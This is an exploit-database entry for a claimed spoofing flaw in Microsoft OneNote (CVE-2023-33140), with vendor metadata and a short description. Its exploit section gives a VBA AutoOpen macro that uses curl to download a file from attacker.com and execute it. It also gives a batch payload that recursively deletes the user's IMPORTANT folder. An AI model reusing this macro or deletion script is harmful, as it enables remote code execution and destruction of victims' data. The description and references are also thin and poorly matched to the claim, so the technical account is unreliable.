header-logo
Suggest Exploit
vendor:
OneNote
by:
nu11secur1ty
N/A
CVSS
HIGH
Spoofing
20
CWE
Product Name: OneNote
Affected Version From: Version 2305 Build 16.0.16501.20074
Affected Version To: Version 2305 Build 16.0.16501.20074
Patch Exists: NO
Related CWE: CVE-2023-33140
CPE: a:microsoft:onenote:2305:16.0.16501.20074
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit – Spoofing

Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker.

Mitigation:

No known mitigation at the moment
Source

Exploit-DB raw data:

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected

## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.

STATUS: HIGH Vulnerability

[+]Exploit:
```vbs
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub

```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)

## Time spend:
01:15:00


--